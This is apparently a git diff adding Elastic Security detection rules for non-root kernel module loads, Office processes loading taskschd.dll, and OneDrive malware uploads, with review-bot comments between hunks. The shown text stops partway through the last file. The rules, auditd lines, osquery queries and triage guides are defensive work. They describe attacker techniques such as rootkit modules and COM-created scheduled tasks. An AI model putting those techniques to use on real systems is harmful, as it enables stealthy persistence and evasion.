diff --git a/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_2.json b/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_2.json new file mode 100644 index 00000000000..719a1186c7c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_2.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the loading of a Linux kernel module by a non-root user through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load by non-root User", + "query": "driver where host.os.type == \"linux\" and event.action == \"loaded-kernel-module\" and\nauditd.data.syscall in (\"init_module\", \"finit_module\") and user.id != \"0\"\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ba81c182-4287-489d-af4d-8ae834b06040", + "setup": "\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\"\n -- \"-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\"\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + 
"tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "ba81c182-4287-489d-af4d-8ae834b06040_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_3.json b/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_3.json new file mode 100644 index 00000000000..ea6383e6d9f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_3.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the loading of a Linux kernel module by a non-root user through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load by non-root User", + "query": "driver where host.os.type == \"linux\" and event.action == \"loaded-kernel-module\" and\nauditd.data.syscall in (\"init_module\", \"finit_module\") and user.id != \"0\"\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ba81c182-4287-489d-af4d-8ae834b06040", + "setup": "## Setup\n\n\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\"\n -- \"-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\"\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": 
{ + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "ba81c182-4287-489d-af4d-8ae834b06040_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_108.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_108.json new file mode 100644 index 00000000000..fcd8ac1f8b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_108.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Image Load (taskschd.dll) from MS Office", + "note": "## Triage and analysis\n\n### Investigating Suspicious Image Load (taskschd.dll) from MS Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. These attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\n`taskschd.dll` provides Command Object Model (COM) interfaces for the Windows Task Scheduler service, allowing developers to programmatically manage scheduled tasks.\n\nThis rule looks for an MS Office process loading `taskschd.dll`, which may indicate an adversary abusing COM to configure a scheduled task. This can happen as part of a phishing attack, when a malicious office document registers the scheduled task to download the malware \"stage 2\" or to establish persistent access.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Analyze the host's scheduled tasks and explore the related Windows events to determine if tasks were created or deleted (Event IDs 4698 and 4699).\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the files downloaded during the past 24 hours.\n - Identify files that are related or can be executed in MS Office.\n - Identify and analyze macros that these documents contain.\n - Identify suspicious traits in the office macros, such as encoded or encrypted sections.\n- Retrieve the suspicious files identified in the previous step and determine if they are malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related Rules\n\n- Suspicious WMI Image Load from MS Office - 891cb88e-441a-4c3e-be2d-120d99fe7b0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022_108", + "type": "security-rule" +} \ No newline at end of file 
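Review bot: The `note` string expands COM as `Command Object Model (COM)` while `description` in the same file correctly says `Windows Component Object Model (COM)`; the investigation guide sentence should read `` `taskschd.dll` provides Component Object Model (COM) interfaces for the Windows Task Scheduler service ``. The `_109` copy in the next hunk carries the same sentence. Nothing else in this file differs from what the query needs, so this is a wording-only fix.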
diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_109.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_109.json new file mode 100644 index 00000000000..187054d3a3f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_109.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.library-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Image Load (taskschd.dll) from MS Office", + "note": "## Triage and analysis\n\n### Investigating Suspicious Image Load (taskschd.dll) from MS Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. These attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\n`taskschd.dll` provides Command Object Model (COM) interfaces for the Windows Task Scheduler service, allowing developers to programmatically manage scheduled tasks.\n\nThis rule looks for an MS Office process loading `taskschd.dll`, which may indicate an adversary abusing COM to configure a scheduled task. This can happen as part of a phishing attack, when a malicious office document registers the scheduled task to download the malware \"stage 2\" or to establish persistent access.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Analyze the host's scheduled tasks and explore the related Windows events to determine if tasks were created or deleted (Event IDs 4698 and 4699).\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the files downloaded during the past 24 hours.\n - Identify files that are related or can be executed in MS Office.\n - Identify and analyze macros that these documents contain.\n - Identify suspicious traits in the office macros, such as encoded or encrypted sections.\n- Retrieve the suspicious files identified in the previous step and determine if they are malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related Rules\n\n- Suspicious WMI Image Load from MS Office - 891cb88e-441a-4c3e-be2d-120d99fe7b0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022_109", + "type": "security-rule" +} \ No newline at end of file 
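Review bot: `index` now lists `logs-endpoint.events.library-*` where the `_108` copy used `logs-endpoint.events.*`, but `query` still accepts `event.category : ("library", "driver")`; if Elastic Defend writes driver image loads to a data stream other than `library`, that branch of the query silently stops matching on endpoint data after this narrowing. If driver events do land in the library stream, a short line in `setup` saying so, e.g. `Elastic Defend driver and library loads are both read from logs-endpoint.events.library-*.`, would spare the next reader the same check. Confirm against the endpoint integration's data stream layout before wording it.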
diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_103.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_103.json new file mode 100644 index 00000000000..4224ff9b548 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_103.json 
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "OneDrive Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + 
"id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_105.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_105.json new file mode 100644 index 00000000000..c5a4b3785e9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_105.json 
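Review bot: The `note` field is the empty string in this high-severity rule (`"note": ""` just before `query`), so analysts get no triage or response guidance, whereas the bd2c86a0 rule added later in this commit ships a full "Triage and analysis" section. Consider populating it with the questions an analyst needs answered when a OneDrive upload is flagged as malware — which account uploaded the file, whether it was shared onward, and which endpoints fetched it — or at least stating why the field is deliberately empty. The identical _105 and _206 versions of this rule added below have the same gap. The description also misspells "occurence" (should be "occurrence") in all three versions; since these files appear to be generated from upstream rule sources, the fix belongs there rather than in this package.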
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "OneDrive Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + 